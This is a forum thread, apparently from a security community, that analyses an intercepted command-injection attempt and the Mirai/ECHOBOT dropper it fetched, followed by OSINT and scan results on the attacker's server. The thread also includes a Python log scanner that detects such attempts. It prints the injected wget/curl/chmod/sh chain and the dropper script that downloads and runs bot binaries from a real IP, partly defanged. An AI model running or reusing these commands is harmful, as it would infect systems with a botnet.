What Lies Behind This Command Injection?

We intercepted a Command Injection, which came in via a website that we monitor. Note: I’ve removed client specific data from this, and I’m using GENERALIZED URL information to demonstrate what the command was supposed to do. We found the script he was using to try and exploit the server - he was a script kiddie from Russia. (Host was not vulnerable! Keep your sh*t updated!!! Otherwise, this would’ve been a cleanup day, not a post!)

WARNING: EVERYTHING AFTER THIS IS HIGHLY MALICIOUS!!!


www.example.com/location/to/script.extension?wget%20http://145.249(dot)106.241/richard;curl%20-O%20hxxp://145.249(dot)106.241/richard;chmod%20+x richard;sh richard;

This translates to


#Vulnerable Website Executes the following commands server side.
wget hxxp://145.249(dot)106.241/richard; #First download
curl -O hxxp://145.249(dot)106.241/richard; #second download
chmod +x richard; #Make Richard executable
sh richard #Executes the script "richard"

Sometimes hosts block specific commands (like wget and curl), hence run both. Worst that happens is one overwrites the other!

I pulled that file from their server and found this.


#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm; chmod +x ECHOBOT.arm; ./ECHOBOT.arm; rm -rf ECHOBOT.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm4; chmod +x ECHOBOT.arm4; ./ECHOBOT.arm4; rm -rf ECHOBOT.arm4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm5; chmod +x ECHOBOT.arm5; ./ECHOBOT.arm5; rm -rf ECHOBOT.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm6; chmod +x ECHOBOT.arm6; ./ECHOBOT.arm6; rm -rf ECHOBOT.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm7; chmod +x ECHOBOT.arm7; ./ECHOBOT.arm7; rm -rf ECHOBOT.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.i686; chmod +x ECHOBOT.i686; ./ECHOBOT.i686; rm -rf ECHOBOT.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.m68k; chmod +x ECHOBOT.m68k; ./ECHOBOT.m68k; rm -rf ECHOBOT.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.mips; chmod +x ECHOBOT.mips; ./ECHOBOT.mips; rm -rf ECHOBOT.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241ECHOBOT.mpsl; chmod +x ECHOBOT.mpsl; ./ECHOBOT.mpsl; rm -rf ECHOBOT.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.ppc; chmod +x ECHOBOT.ppc; ./ECHOBOT.ppc; rm -rf ECHOBOT.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.sh4; chmod +x ECHOBOT.sh4; ./ECHOBOT.sh4; rm -rf ECHOBOT.sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.spc; chmod +x ECHOBOT.spc; ./ECHOBOT.spc; rm -rf ECHOBOT.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.x86; chmod +x ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86

The explanation of these commands is as follows.

If you cannot cd /tmp, try /var/run, else try /mnt, else try /root, else try /. If one of those returns true, move on to the next command (wget). If you were studious, you may have noticed a typo in this guy's script. It tries one version, then deletes itself. Try them all. He’d have a listener listening until one of the ECHOBOTs reported back.

Of course, these are just simple wget functions! We can download that as well!


curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm4
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm5
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm6
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm7
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)i686
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)m68k
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)mips
curl -O hxxp://145(dot)249(dot)106(dot)241ECHOBOT(dot)mpsl
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)ppc
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)sh4
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)spc
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)x86

What do these files reveal? None other than Mirai, the backdoor/botnet!

https://www.virustotal.com/gui/file-analysis/NTAxZGQwY2M5MGYyODkyOTYwMzNlY2FkYWE2MjYwNGY6MTU3NjEwNjY2OQ==/detection

Good attempt, but failed miserably. To date, we’d (my company) had never been able to grab a live sample of Mirai. Today, I managed to grab it as it happened! Cheers to the IPS/IDS product that successfully detected and blocked the exploit attempt!

As of writing this post, those links are still live! You have been warned!
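As an added example (not code from the thread or from any of its participants), here is a small Python log check for the download-and-execute chain quoted above: it pulls the request target out of constructed access-log lines (placeholder client IPs and a placeholder hosting IP), URL-decodes the query twice so double-encoded variants are normalised, and flags lines that combine a shell separator with at least two chain stages.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the thread): client IPs, the hosting
# IP and the path are placeholders; line 1 mirrors the wget;curl;chmod;sh chain
# quoted in the post, line 4 is a double-encoded variant of the same idea.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2019:10:00:01 +0000] "GET /location/to/script.extension?wget%20http://192.0.2.10/richard;curl%20-O%20http://192.0.2.10/richard;chmod%20+x%20richard;sh%20richard; HTTP/1.1" 200 512
203.0.113.8 - - [12/Dec/2019:10:00:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024
203.0.113.9 - - [12/Dec/2019:10:00:03 +0000] "GET /search?q=wget%20manual HTTP/1.1" 200 2048
203.0.113.10 - - [12/Dec/2019:10:00:04 +0000] "GET /cgi-bin/x.cgi?a=1%257Ccurl%2520-O%2520http://192.0.2.10/r%253Bsh%2520r HTTP/1.1" 404 0
"""

REQUEST_TARGET = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Shell separators ('&' also joins query parameters, hence the two-stage rule below)
SEPARATOR = re.compile(r'[;|&\n`]|\$\(')
# Stages of the chain, matched against the fully decoded query string.
STAGES = {
    'download': re.compile(r'\b(?:wget|curl)\b[^;|&\n]*https?://'),
    'chmod':    re.compile(r'\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b'),
    'execute':  re.compile(r'(?:^|[;|&\s])(?:sh|bash|\./\S+)\b'),
}

def decode_query(target):
    """Query part of a request target, URL-decoded twice so that double-encoded
    payloads (%2520 -> %20 -> space) look the way the shell would see them."""
    return unquote(unquote(target.partition('?')[2]))

def chain_stages(query):
    """Names of the chain stages present in an already decoded query string."""
    return [name for name, rx in STAGES.items() if rx.search(query)]

def is_injection_chain(query):
    """A separator plus at least two stages counts as an attempt; a lone 'wget'
    inside a search term does not."""
    return bool(SEPARATOR.search(query)) and len(chain_stages(query)) >= 2

def scan_log(text):
    """Return (client_ip, decoded_query, stages) for each suspicious log line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        query = decode_query(m.group(1))
        if is_injection_chain(query):
            hits.append((line.split()[0], query, chain_stages(query)))
    return hits

if __name__ == '__main__':
    for ip, query, stages in scan_log(SAMPLE_LOG):
        print(f'{ip}: {"+".join(stages)} :: {query}')
```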

Hi Michael (alan1998),

Here is a full analysis of that specific malware from 6 hours ago:
-https://maltiverse.com/sample/3a648ce765acd54fab4cbe4f35ddb962572a27d9522fa92105ef6324af47711e
(make link live for researchers :wink: ) Let’s see how long it takes before Avast has detection for this.

Launched via an Amsterdam (the Netherlands) rack? → https://www.shodan.io/host/145.249.106.241
on linux.3x portmapper port 111? Fixed line ISP with a Bulgarian connection.

Thanks for reporting. You could also report to UrlHaus. :wink: :-X

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter).

The command injection itself came from Russia - not the web server hosting the malware :P.

commandline
http://145.249.106.241/richard;%20curl%20-O%20http:/145.249.106.241/richard;%20chmod%20+x%20richard;%20sh%20richard

Pulled that from the report - look familiar?? I may have missed the odd space or two (%20) but it’s pretty damn close!

I had a port scan on them via one of our VMs. They must’ve switched boxes because my port scans (from yesterday) revealed a CentOS 7 box. It had a bunch of ports open, Telnet (23) - Filtered, 3306, 5555, 5000, 5060, among others. I’m not at the office today, but I’ll be able to grab the port scan tomorrow.

Hi Michael (alan1998),

Command injection may have come in from Russia, if this * (see below) is what you mean,
but that Apache HTTP Server seems to be nothing more than having the proverbial ‘sieve’/holed Swiss cheese grade status.
See all the permissions that can be set to your advance.

IP opens up to Apache 2 HTTP Server Test page powered by Centos.
Has Apache/2.2.15 CentOS

Does not offer a secure connection, does not supply ownership information.

A TLS renegotiation prefix injection attack is possible *.
See: https://www.cvedetails.com/version/93077/Apache-Http-Server-2.2.15.html
&
https://www.cvedetails.com/vulnerability-list.php?vendor_id=45&product_id=66&version_id=93077&page=1&hasexp=0&opdos=0&opec=0&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=0&cweid=0&order=1&trc=29&sha=f3811a977415e66eff5d8b9d9b8c21d064617677

Insecure permissions possible. CSP tester can be used actively.

7 solutions now detect the IP URI given in the first posting of this thread:
https://www.virustotal.com/gui/ip-address/145.249.106.241/relations

IP address is owned by IP Volume Inc from the Seychelles (Liberty Services), IP Broker Ltd.
OpenSSH 5.3 (protocol 2.0) on port 22; 80 tcp open - http methods - risky method: TRACE

For the accompanying shellscript detection, see: https://www.virustotal.com/gui/file/0e87d4a97b64beb7fe27e0b21d73eb0da353467d99710566dda8b07f953798ef/detection

Now 29 (initially 30) engines detect it, and Avast & AVG detect this malware as “BV:Downloader-AAN [Drp]”.
We have protection! Avast Mobile does not have it, but I do not know whether that’s a point :smiley:
Can you fill me in on that point, roger?

Consider high risk 9 red out of 10 here: -https://toolbar.netcraft.com/site_report?url=http%3A%2F%2F145.249.106.241%2Frichard%3B%2520curl%2520-O%2520http%3A%2F145.249.106.241%2Frichard%3B%2520chmod%2520%2Bx%2520richard%3B%2520sh%2520richard+

&

Netcraft risk grade 9 red out of 10: https://toolbar.netcraft.com/site_report?url=145.249.106.241

Immediate threats that helped this malcreant/attacker abuse:

Susceptible to MiM attacks - because SSL is not available.

Vulnerabilities can be uncovered more easily, because the Server information header is exposed,
so excessive header information proliferation.

Vulnerabilities
Vulnerable software versions detected

Unnecessary open ports
App ports open

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

What is being hosted by AS29073 Quasi Network LTD? - https://www.who-hosts-this.com/Hosts/1322-Quasi-Networks-LTD
Smut sites galore and one of the other sites with a minimal to non-existent grade of security: https://internet.nl/site/rootcracked.com/678002/

This is an obscure and shady hosting party: Hosting sites with messages like
“This domain name registration has expired and renewal or deletion are pending.
If you are the registrant and want to renew the domain name, please contact your registration service provider.”
Also spammer - see list of vulnerabilities here: https://www.shodan.io/host/145.249.106.241

145.249.106.241
Liberty
Added on 2019-12-12 12:49:16 GMT
Netherlands Netherlands, Amsterdam

Part of those darknet back-alleys of the Interwebz. & human abuse, etc. etc.
Stay out, do not go or venture out there.

Some Intelligence to prove this: https://intelx.io/?s=quasinetworks.com (info credits Intelligence X)

Can imagine certain cybercriminal attackers and malware launchers
that would prefer to operate from within such swamp surroundings to do their evil scripting deeds.

Who would come and look for them there, and who’s to complain about their additional abuse?

polonus

When I get home, I’ll rescan their IP address. Looks like they closed some of their ports…

But for the mean time, I have scanning to do on a client network. Saddening to hear reports of CP being reported and not taken down. But by the second report I’d have gone to the authorities, not continued reporting to the same body who has previously ignored it.

Cheers,
Mike

Well done, Mike, :wink: :stuck_out_tongue:

I hope authorities in the capital city of my country will read here as well.
Furthermore hope they are in the position to close down the illegal part of the activities going on there a.s.a.p.,
and send it to permanent digital oblivion.

Gives me a good feeling that we can cooperate in the way we do,
as all good researchers should stand on each others shoulders.

Keep fighting the good battle in the digital realms and keep racks and code up to solid high and secure standards.

Cheers, my good friend, kind regards from,

polonus aka Damian

Just getting around to that final scan.

Website reports as offline.


Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-12 23:08 Atlantic Standard Time
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Initiating Ping Scan at 23:08
Scanning 145.249.106.241 [4 ports]
Completed Ping Scan at 23:08, 3.46s elapsed (1 total hosts)
Nmap scan report for 145.249.106.241 [host down]
NSE: Script Post-scanning.
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Read data files from: C:\Program Files (x86)\Nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 6.47 seconds
           Raw packets sent: 8 (304B) | Rcvd: 0 (0B)